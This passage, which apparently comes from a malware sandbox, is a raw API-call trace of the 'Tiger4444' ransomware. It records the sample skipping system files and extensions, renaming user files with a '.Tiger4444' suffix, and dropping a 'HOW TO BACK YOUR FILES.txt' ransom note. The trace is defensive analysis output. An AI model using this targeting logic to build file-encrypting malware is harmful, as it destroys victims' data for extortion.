hHeap=0xc50000) returned 1 [0050.126] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14157955683) returned 1 [0050.127] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc898d8 | out: hHeap=0xc50000) returned 1 [0050.127] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71b70 | out: hHeap=0xc50000) returned 1 [0050.127] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.127] CloseHandle (hObject=0x2c8) returned 1 [0050.127] CloseHandle (hObject=0x260) returned 1 [0050.128] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\XkvuMMsv206RYIIfQX.flv.Tiger4444") returned 64 [0050.128] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\XkvuMMsv206RYIIfQX.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\xkvummsv206ryiifqx.flv"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\XkvuMMsv206RYIIfQX.flv.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\xkvummsv206ryiifqx.flv.tiger4444"), dwFlags=0x1) returned 1 [0050.129] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7026ce50, ftCreationTime.dwHighDateTime=0x1d4cc48, ftLastAccessTime.dwLowDateTime=0xe6c1b850, ftLastAccessTime.dwHighDateTime=0x1d4c70b, ftLastWriteTime.dwLowDateTime=0xe6c1b850, ftLastWriteTime.dwHighDateTime=0x1d4c70b, nFileSizeHigh=0x0, nFileSizeLow=0x166d8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y4rKx2VEQaUc.bmp", cAlternateFileName="Y4RKX2~1.BMP")) returned 1 [0050.129] lstrcmpiW (lpString1="y4rKx2VEQaUc.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.129] lstrcmpiW (lpString1="y4rKx2VEQaUc.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.129] lstrcmpiW (lpString1="y4rKx2VEQaUc.bmp", lpString2="Tiger4444.exe") returned 1 [0050.129] lstrcmpiW (lpString1="y4rKx2VEQaUc.bmp", lpString2=".") returned 1 [0050.129] lstrcmpiW (lpString1="y4rKx2VEQaUc.bmp", lpString2="..") returned 1 [0050.129] lstrcmpiW (lpString1="y4rKx2VEQaUc.bmp", lpString2="windows") returned 1 [0050.129] lstrcmpiW (lpString1="y4rKx2VEQaUc.bmp", lpString2="bootmgr") returned 1 [0050.129] lstrcmpiW (lpString1="y4rKx2VEQaUc.bmp", lpString2="pagefile.sys") returned 1 [0050.129] lstrcmpiW (lpString1="y4rKx2VEQaUc.bmp", lpString2="boot") returned 1 [0050.129] lstrcmpiW (lpString1="y4rKx2VEQaUc.bmp", lpString2="ids.txt") returned 1 [0050.129] lstrcmpiW (lpString1="y4rKx2VEQaUc.bmp", lpString2="NTUSER.DAT") returned 1 [0050.129] lstrcpyW (in: lpString1=0x30aeae8, lpString2="y4rKx2VEQaUc.bmp" | out: lpString1="y4rKx2VEQaUc.bmp") returned="y4rKx2VEQaUc.bmp" [0050.129] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\y4rKx2VEQaUc.bmp", dwFileAttributes=0x0) returned 1 [0050.130] lstrlenW (lpString="y4rKx2VEQaUc.bmp") returned 16 [0050.130] lstrlenW (lpString="Tiger4444") returned 9 [0050.130] lstrcmpiW (lpString1="EQaUc.bmp", lpString2="Tiger4444") returned -1 [0050.130] lstrlenW (lpString=".dll") returned 4 [0050.130] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0050.130] lstrlenW (lpString=".lnk") returned 4 [0050.130] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0050.130] lstrlenW (lpString=".ini") returned 4 [0050.130] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0050.130] lstrlenW (lpString=".sys") returned 4 [0050.130] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0050.130] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\y4rKx2VEQaUc.bmp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\y4rkx2veqauc.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.130] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.130] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14158359788) returned 1 [0050.131] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=91864) returned 1 [0050.131] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89608 [0050.131] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc720c0 [0050.131] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x169e0, lpName=0x0) returned 0x2c8 [0050.131] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x169e0) returned 0xbe0000 [0050.133] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.133] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0050.133] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.133] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0050.133] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.133] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0050.133] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.133] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0050.133] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14158631837) returned 1 [0050.133] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89608 | out: hHeap=0xc50000) returned 1 [0050.133] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc720c0 | out: hHeap=0xc50000) returned 1 [0050.133] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.134] CloseHandle (hObject=0x2c8) returned 1 [0050.134] CloseHandle (hObject=0x260) returned 1 [0050.135] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\y4rKx2VEQaUc.bmp.Tiger4444") returned 58 [0050.135] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\y4rKx2VEQaUc.bmp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\y4rkx2veqauc.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\y4rKx2VEQaUc.bmp.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\y4rkx2veqauc.bmp.tiger4444"), dwFlags=0x1) returned 1 [0050.136] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdaa72e30, ftCreationTime.dwHighDateTime=0x1d4c597, ftLastAccessTime.dwLowDateTime=0x60e16990, ftLastAccessTime.dwHighDateTime=0x1d4ce83, ftLastWriteTime.dwLowDateTime=0x60e16990, ftLastWriteTime.dwHighDateTime=0x1d4ce83, nFileSizeHigh=0x0, nFileSizeLow=0xe2e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yAdKv7OjIt.gif", cAlternateFileName="YADKV7~1.GIF")) returned 1 [0050.136] lstrcmpiW (lpString1="yAdKv7OjIt.gif", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.136] lstrcmpiW (lpString1="yAdKv7OjIt.gif", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.136] lstrcmpiW (lpString1="yAdKv7OjIt.gif", lpString2="Tiger4444.exe") returned 1 [0050.136] lstrcmpiW (lpString1="yAdKv7OjIt.gif", lpString2=".") returned 1 [0050.136] lstrcmpiW (lpString1="yAdKv7OjIt.gif", lpString2="..") returned 1 [0050.136] lstrcmpiW (lpString1="yAdKv7OjIt.gif", lpString2="windows") returned 1 [0050.136] lstrcmpiW (lpString1="yAdKv7OjIt.gif", lpString2="bootmgr") returned 1 [0050.136] lstrcmpiW (lpString1="yAdKv7OjIt.gif", lpString2="pagefile.sys") returned 1 [0050.136] lstrcmpiW (lpString1="yAdKv7OjIt.gif", lpString2="boot") returned 1 [0050.136] lstrcmpiW (lpString1="yAdKv7OjIt.gif", lpString2="ids.txt") returned 1 [0050.136] lstrcmpiW (lpString1="yAdKv7OjIt.gif", lpString2="NTUSER.DAT") returned 1 [0050.136] lstrcpyW (in: lpString1=0x30aeae8, lpString2="yAdKv7OjIt.gif" | out: lpString1="yAdKv7OjIt.gif") returned="yAdKv7OjIt.gif" [0050.136] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\yAdKv7OjIt.gif", dwFileAttributes=0x0) returned 1 [0050.137] lstrlenW (lpString="yAdKv7OjIt.gif") returned 14 [0050.137] lstrlenW (lpString="Tiger4444") returned 9 [0050.137] lstrcmpiW (lpString1="7OjIt.gif", lpString2="Tiger4444") returned -1 [0050.137] lstrlenW (lpString=".dll") returned 4 [0050.137] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0050.137] lstrlenW (lpString=".lnk") returned 4 [0050.137] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0050.137] lstrlenW (lpString=".ini") returned 4 [0050.137] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0050.137] lstrlenW (lpString=".sys") returned 4 [0050.137] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0050.137] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\yAdKv7OjIt.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\yadkv7ojit.gif"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.137] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.137] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14159054675) returned 1 [0050.137] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=58082) returned 1 [0050.138] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89a40 [0050.138] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71378 [0050.138] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe5f0, lpName=0x0) returned 0x2c8 [0050.138] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe5f0) returned 0xbe0000 [0050.140] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.140] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0050.140] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.140] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0050.140] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.140] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0050.140] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.140] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0050.140] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14159350748) returned 1 [0050.140] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89a40 | out: hHeap=0xc50000) returned 1 [0050.141] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0050.141] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.141] CloseHandle (hObject=0x2c8) returned 1 [0050.141] CloseHandle (hObject=0x260) returned 1 [0050.142] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\yAdKv7OjIt.gif.Tiger4444") returned 56 [0050.142] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\yAdKv7OjIt.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\yadkv7ojit.gif"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\yAdKv7OjIt.gif.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\yadkv7ojit.gif.tiger4444"), dwFlags=0x1) returned 1 [0050.143] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97219790, ftCreationTime.dwHighDateTime=0x1d4cd17, ftLastAccessTime.dwLowDateTime=0x68c139e0, ftLastAccessTime.dwHighDateTime=0x1d4d0ec, ftLastWriteTime.dwLowDateTime=0x68c139e0, ftLastWriteTime.dwHighDateTime=0x1d4d0ec, nFileSizeHigh=0x0, nFileSizeLow=0x4832, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_lYb0S3w_SO.xls", cAlternateFileName="_LYB0S~1.XLS")) returned 1 [0050.143] lstrcmpiW (lpString1="_lYb0S3w_SO.xls", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.143] lstrcmpiW (lpString1="_lYb0S3w_SO.xls", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.143] lstrcmpiW (lpString1="_lYb0S3w_SO.xls", lpString2="Tiger4444.exe") returned -1 [0050.143] lstrcmpiW (lpString1="_lYb0S3w_SO.xls", lpString2=".") returned 1 [0050.143] lstrcmpiW (lpString1="_lYb0S3w_SO.xls", lpString2="..") returned 1 [0050.143] lstrcmpiW (lpString1="_lYb0S3w_SO.xls", lpString2="windows") returned -1 [0050.143] lstrcmpiW (lpString1="_lYb0S3w_SO.xls", lpString2="bootmgr") returned -1 [0050.143] lstrcmpiW (lpString1="_lYb0S3w_SO.xls", lpString2="pagefile.sys") returned -1 [0050.143] lstrcmpiW (lpString1="_lYb0S3w_SO.xls", lpString2="boot") returned -1 [0050.143] lstrcmpiW (lpString1="_lYb0S3w_SO.xls", lpString2="ids.txt") returned -1 [0050.143] lstrcmpiW (lpString1="_lYb0S3w_SO.xls", lpString2="NTUSER.DAT") returned -1 [0050.143] lstrcpyW (in: lpString1=0x30aeae8, lpString2="_lYb0S3w_SO.xls" | out: lpString1="_lYb0S3w_SO.xls") returned="_lYb0S3w_SO.xls" [0050.143] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\_lYb0S3w_SO.xls", dwFileAttributes=0x0) returned 1 [0050.144] lstrlenW (lpString="_lYb0S3w_SO.xls") returned 15 [0050.144] lstrlenW (lpString="Tiger4444") returned 9 [0050.144] lstrcmpiW (lpString1="3w_SO.xls", lpString2="Tiger4444") returned -1 [0050.144] lstrlenW (lpString=".dll") returned 4 [0050.144] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0050.144] lstrlenW (lpString=".lnk") returned 4 [0050.144] lstrcmpiW (lpString1=".xls", lpString2=".lnk") returned 1 [0050.144] lstrlenW (lpString=".ini") returned 4 [0050.144] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0050.144] lstrlenW (lpString=".sys") returned 4 [0050.144] lstrcmpiW (lpString1=".xls", lpString2=".sys") returned 1 [0050.144] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\_lYb0S3w_SO.xls" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\_lyb0s3w_so.xls"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.144] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.144] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14159736108) returned 1 [0050.144] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=18482) returned 1 [0050.144] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89860 [0050.144] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71b70 [0050.144] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b40, lpName=0x0) returned 0x2c8 [0050.145] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4b40) returned 0xbe0000 [0050.146] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.146] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0050.146] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.146] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0050.146] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.146] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0050.146] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.146] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0050.146] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14159948558) returned 1 [0050.146] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89860 | out: hHeap=0xc50000) returned 1 [0050.146] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71b70 | out: hHeap=0xc50000) returned 1 [0050.147] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.147] CloseHandle (hObject=0x2c8) returned 1 [0050.147] CloseHandle (hObject=0x260) returned 1 [0050.148] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\_lYb0S3w_SO.xls.Tiger4444") returned 57 [0050.148] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\_lYb0S3w_SO.xls" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\_lyb0s3w_so.xls"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\_lYb0S3w_SO.xls.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\_lyb0s3w_so.xls.tiger4444"), dwFlags=0x1) returned 1 [0050.149] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97219790, ftCreationTime.dwHighDateTime=0x1d4cd17, ftLastAccessTime.dwLowDateTime=0x68c139e0, ftLastAccessTime.dwHighDateTime=0x1d4d0ec, ftLastWriteTime.dwLowDateTime=0x68c139e0, ftLastWriteTime.dwHighDateTime=0x1d4d0ec, nFileSizeHigh=0x0, nFileSizeLow=0x4832, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_lYb0S3w_SO.xls", cAlternateFileName="_LYB0S~1.XLS")) returned 0 [0050.149] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0050.149] lstrcpyW (in: lpString1=0x30aeae8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0050.149] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0050.149] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0050.149] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0050.151] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.151] CloseHandle (hObject=0x260) returned 1 [0050.151] CloseHandle (hObject=0x2ac) returned 1 [0050.151] GetCurrentThreadId () returned 0xfa8 [0050.151] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc665c8 [0050.151] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun" [0050.151] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7b738 | out: hHeap=0xc50000) returned 1 [0050.151] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc665c0 | out: hHeap=0xc50000) returned 1 [0050.151] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun" [0050.151] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\" [0050.151] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\.BFC0E91B00AE8A0620D3" [0050.151] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\sun\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0050.153] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0050.156] FlushFileBuffers (hFile=0x2ac) returned 1 [0050.157] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0050.157] CloseHandle (hObject=0x2ac) returned 1 [0050.158] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun") returned 35 [0050.158] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0050.158] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad2cc5cd, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xad2cc5cd, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x82e98729, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72f88 [0050.158] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.158] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.158] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0050.158] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0050.158] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad2cc5cd, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xad2cc5cd, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x82e98729, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.158] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.158] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.158] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0050.158] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0050.158] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0050.158] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x82e98729, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x82e98729, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x82e98729, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0050.158] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.158] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0050.158] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad2cc5cd, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xad2cc5cd, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xad2cc5cd, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1 [0050.159] lstrcmpiW (lpString1="Java", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.159] lstrcmpiW (lpString1="Java", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.159] lstrcmpiW (lpString1="Java", lpString2="Tiger4444.exe") returned -1 [0050.159] lstrcmpiW (lpString1="Java", lpString2=".") returned 1 [0050.159] lstrcmpiW (lpString1="Java", lpString2="..") returned 1 